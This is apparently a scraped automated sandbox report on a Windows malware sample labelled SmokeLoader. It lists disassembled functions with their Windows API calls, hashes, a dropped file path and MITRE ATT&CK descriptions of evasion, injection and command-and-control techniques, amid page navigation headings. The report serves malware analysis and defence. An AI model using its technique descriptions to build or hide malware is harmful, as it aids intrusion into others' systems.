FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004174BD
GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 004174FD
GetComputerNameW.KERNEL32(?,?), ref: 00417511
SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041751F
OpenJobObjectA.KERNEL32(00000000,00000000,004193C0), ref: 0041752E
GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 0041753F

Strings

-, xrefs: 0041754C

Memory Dump Source

Source File: 00000005.00000002.2040991261.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_scjabht.jbxd

Similarity

API ID: Name$AvailableBuildCalendarCommComputerEnvironmentFreeInfoMemoryNodeNumaObjectOpenPathPrivateProfileShortStringStringsWrite
String ID: -
API String ID: 113859268-2547889144
Opcode ID: af8605d0b3a4fb53b992738fe7becc4eb360322e70412ad4efd0eb029d8f9bbd
Instruction ID: a463e9529dcf8072e3b7220abe1072026f108712342e539d7c254fb5de8a9354
Opcode Fuzzy Hash: af8605d0b3a4fb53b992738fe7becc4eb360322e70412ad4efd0eb029d8f9bbd
Instruction Fuzzy Hash: 7A21D830A8430CABE7209F60DC85FDD7F70EB0C755F1181AAF749AA1C0CAB41AC88B59

Function 00417580 Relevance: 6.0, APIs: 4, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

QueryDosDeviceA.KERNEL32(00000000,?,00000000), ref: 004175B4
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004175CF
HeapDestroy.KERNEL32(00000000), ref: 004175EE
GetNumaProcessorNode.KERNEL32(?,00000000), ref: 004175FD

Memory Dump Source

Source File: 00000005.00000002.2040991261.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_scjabht.jbxd

Similarity

API ID: DestroyDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
String ID:
API String ID: 4159173863-0
Opcode ID: a70025092311ae8c4b0cb20251c783b4c81ae9268d6ec19b84262a1c22d03a33
Instruction ID: 3d7b8869d9909e6524e9da05564ce57d4bd3bf1de3f4668ec111e10b9b533a75
Opcode Fuzzy Hash: a70025092311ae8c4b0cb20251c783b4c81ae9268d6ec19b84262a1c22d03a33
Instruction Fuzzy Hash: 4701D4B1A441089BD750EB64ED85BEA37B8EB0C746F41402AF709A7281DF742944CF59

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 1HGXcC63iu.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: SmokeLoader

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\scjabht

C:\Users\user\AppData\Roaming\scjabht:Zone.Identifier

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Windows Analysis Report
1HGXcC63iu.exe

Function 00417620 Relevance: 38.8, APIs: 20, Strings: 2, Instructions: 269
filelibrarypipeCOMMON

Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201
nativeCOMMON

Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167
nativeCOMMON

Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162
nativeCOMMON

Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Function 02DD03D8 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Function 02D9003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Function 004178E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65
libraryCOMMON

Function 00417290 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
librarymemoryloaderCOMMON

Function 02D90E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63
sleepCOMMON

Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59
sleepCOMMON

Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON